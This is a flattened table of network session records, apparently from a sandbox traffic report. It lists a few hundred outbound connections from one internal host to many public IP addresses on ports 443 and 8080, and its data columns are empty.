                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15042192.168.2.2334428166.108.104.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15043192.168.2.2357222149.129.169.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15044192.168.2.2352680135.28.242.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15045192.168.2.2349252106.16.98.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15046192.168.2.235514018.69.111.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15047192.168.2.2341988172.155.59.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15048192.168.2.2358294107.88.151.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15049192.168.2.234597669.59.168.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15050192.168.2.2354292156.67.214.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15051192.168.2.2335764166.137.227.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15052192.168.2.2356344212.27.220.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15053192.168.2.233455275.209.219.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15054192.168.2.233399893.34.250.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15055192.168.2.2346518223.249.18.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15056192.168.2.235355437.118.136.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15057192.168.2.234390292.155.82.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15058192.168.2.2339000189.51.183.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15059192.168.2.233470670.237.109.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15060192.168.2.2342704124.132.91.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15061192.168.2.2332772161.50.154.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15062192.168.2.2349234196.181.185.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15063192.168.2.2336184185.151.24.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15064192.168.2.235885448.253.99.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15065192.168.2.234482894.63.227.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15066192.168.2.2350260118.54.87.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15067192.168.2.235977863.78.45.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15068192.168.2.2344480180.152.253.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15069192.168.2.2348530100.172.183.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15070192.168.2.235903652.75.15.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15071192.168.2.2358230137.45.191.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15072192.168.2.2356660197.171.194.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15073192.168.2.234773874.74.204.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15074192.168.2.2337660113.203.179.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15075192.168.2.2348090125.210.164.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15076192.168.2.234193679.16.55.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15077192.168.2.2340452136.150.75.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15078192.168.2.2348130156.48.30.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15079192.168.2.235945485.13.188.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15080192.168.2.2358614220.255.89.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15081192.168.2.235044642.20.139.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15082192.168.2.234585619.95.61.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15083192.168.2.235301469.162.39.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15084192.168.2.235034251.233.233.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15085192.168.2.234792647.32.91.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15086192.168.2.2356966219.91.62.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15087192.168.2.234521669.24.57.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15088192.168.2.2360892219.208.148.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15089192.168.2.2345264190.190.60.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15090192.168.2.2334398219.48.146.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15091192.168.2.2359392179.255.125.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15092192.168.2.2351654193.131.117.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15093192.168.2.2348832137.119.174.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15094192.168.2.2345792112.128.193.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15095192.168.2.2341306169.250.187.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15096192.168.2.235545617.227.38.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15097192.168.2.2335468206.88.134.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15098192.168.2.235208212.75.74.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15099192.168.2.233379878.240.72.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15100192.168.2.2352768129.250.244.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15101192.168.2.2357452152.29.173.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15102192.168.2.2349748175.79.5.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15103192.168.2.2352876149.153.55.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15104192.168.2.2334122148.241.178.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15105192.168.2.2337960201.222.106.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15106192.168.2.2357402129.50.88.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15107192.168.2.235807270.125.87.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15108192.168.2.2359652156.120.177.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15109192.168.2.233597053.115.61.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15110192.168.2.2335586131.87.246.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15111192.168.2.2359612196.178.134.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15112192.168.2.2338798185.22.127.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15113192.168.2.235648659.16.142.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15114192.168.2.2337844203.133.169.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15115192.168.2.2352644182.210.125.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15116192.168.2.2336304218.70.88.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15117192.168.2.2350034138.120.161.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15118192.168.2.235256867.102.117.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15119192.168.2.2357742201.160.175.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15120192.168.2.235903045.236.86.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15121192.168.2.234216491.119.100.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15122192.168.2.235845695.126.165.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15123192.168.2.234746875.185.196.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15124192.168.2.233675282.111.165.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15125192.168.2.2348234134.173.200.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15126192.168.2.2350120210.27.126.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15127192.168.2.234019289.206.132.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15128192.168.2.2348374188.3.240.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15129192.168.2.2342644223.81.49.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15130192.168.2.2355048136.211.61.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15131192.168.2.235373086.9.112.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15132192.168.2.234673697.138.225.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15133192.168.2.235063290.190.187.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15134192.168.2.235123094.102.166.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15135192.168.2.2335412145.234.211.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15136192.168.2.2340038195.111.189.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15137192.168.2.2340280157.176.17.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15138192.168.2.234393865.119.188.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15139192.168.2.2338784221.172.13.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15140192.168.2.2347470183.167.77.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15141192.168.2.2338424212.77.156.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15142192.168.2.234907043.157.79.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15143192.168.2.234827041.114.94.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15144192.168.2.2335922196.213.9.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15145192.168.2.2352382216.116.113.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15146192.168.2.234088853.89.62.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15147192.168.2.234125051.218.142.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15148192.168.2.2359498171.29.205.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15149192.168.2.235785689.137.127.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15150192.168.2.235470097.22.187.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15151192.168.2.233534031.112.66.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15152192.168.2.2357836161.109.179.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15153192.168.2.233739489.84.37.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15154192.168.2.2343670217.43.0.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15155192.168.2.235535257.253.248.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15156192.168.2.2339324143.109.253.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15157192.168.2.2342452202.206.72.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15158192.168.2.2357816111.93.249.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15159192.168.2.2356974115.217.5.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15160192.168.2.234814212.135.237.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15161192.168.2.2337372128.214.12.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15162192.168.2.2336774207.218.137.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15163192.168.2.2335938113.166.8.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15164192.168.2.2360732205.164.219.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15165192.168.2.2354078131.67.101.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15166192.168.2.2355030199.240.156.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15167192.168.2.2355540135.83.155.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15168192.168.2.2350452172.59.210.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15169192.168.2.233723840.245.108.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15170192.168.2.235774251.206.52.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15171192.168.2.233748464.102.119.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15172192.168.2.233381239.165.165.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15173192.168.2.2354636151.146.28.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15174192.168.2.2333474177.5.202.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15175192.168.2.234232412.153.117.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15176192.168.2.2343858103.253.104.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15177192.168.2.2357716100.60.94.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15178192.168.2.235031689.222.57.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15179192.168.2.235398492.73.62.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15180192.168.2.233466480.31.192.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15181192.168.2.2353264130.202.234.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15182192.168.2.2336524146.28.72.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15183192.168.2.236093846.137.229.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15184192.168.2.2333022155.39.141.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15185192.168.2.2340828101.3.152.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15186192.168.2.233587898.89.183.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15187192.168.2.2359000132.227.6.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15188192.168.2.233358471.208.251.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15189192.168.2.235013463.241.151.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15190192.168.2.2335932140.45.150.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15191192.168.2.2339126119.35.191.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15192192.168.2.2346540201.191.152.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15193192.168.2.2333112144.136.14.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15194192.168.2.2346150190.219.254.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15195192.168.2.2349216194.5.189.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15196192.168.2.2350200183.226.1.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15197192.168.2.2346680162.109.128.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15198192.168.2.235433474.130.156.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15199192.168.2.2346668183.28.46.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15200192.168.2.233928278.69.152.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15201192.168.2.235753464.89.51.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15202192.168.2.2335172110.137.177.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15203192.168.2.2336210134.4.248.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15204192.168.2.236085670.248.37.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15205192.168.2.2338916158.79.124.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15206192.168.2.2336444129.48.57.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15207192.168.2.234245025.142.209.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15208192.168.2.2341094177.68.21.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15209192.168.2.235801679.212.86.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15210192.168.2.2351788163.142.105.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15211192.168.2.235676296.225.252.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15212192.168.2.235746672.206.185.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15213192.168.2.2335490185.4.24.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15214192.168.2.2345948207.203.180.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15215192.168.2.2340366135.253.220.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15216192.168.2.233980263.149.30.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15217192.168.2.2348738145.30.54.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15218192.168.2.234251643.243.155.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15219192.168.2.234917683.142.219.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15220192.168.2.233515235.26.77.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15221192.168.2.233646624.220.101.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15222192.168.2.23354824.156.10.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15223192.168.2.2346858104.36.171.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15224192.168.2.23399384.113.146.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15225192.168.2.2353816173.240.12.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15226192.168.2.2349634102.85.112.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15227192.168.2.2332848193.185.155.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15228192.168.2.2357680118.198.11.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15229192.168.2.2346398174.35.126.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15230192.168.2.2358476186.14.160.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15231192.168.2.235540468.197.126.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15232192.168.2.2336752191.29.183.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15233192.168.2.2345648172.64.2.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15234192.168.2.23422445.157.155.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15235192.168.2.235194045.165.68.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15236192.168.2.2336512191.61.234.1518080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15237192.168.2.235989247.109.76.1538080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15238192.168.2.2342798172.214.106.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15239192.168.2.234860276.169.47.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15240192.168.2.2346476113.87.123.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15241192.168.2.2340668130.95.169.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15242192.168.2.234817245.233.36.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15243192.168.2.2349254138.24.164.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15244192.168.2.235706063.207.179.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15245192.168.2.2358628177.74.200.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15246192.168.2.2348116172.213.187.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15247192.168.2.233452051.108.140.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15248192.168.2.2342908120.217.212.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15249192.168.2.2359350208.64.180.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15250192.168.2.2359906211.172.97.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15251192.168.2.2348996219.116.219.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15252192.168.2.235183823.45.209.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15253192.168.2.2344770153.77.45.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15254192.168.2.235278449.30.30.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15255192.168.2.2356228152.74.251.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15256192.168.2.2359220189.102.214.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15257192.168.2.2348872213.248.175.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15258192.168.2.2338956194.54.151.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15259192.168.2.235421276.211.204.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15260192.168.2.2333478166.179.49.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15261192.168.2.235975619.255.176.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15262192.168.2.2348032139.218.9.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
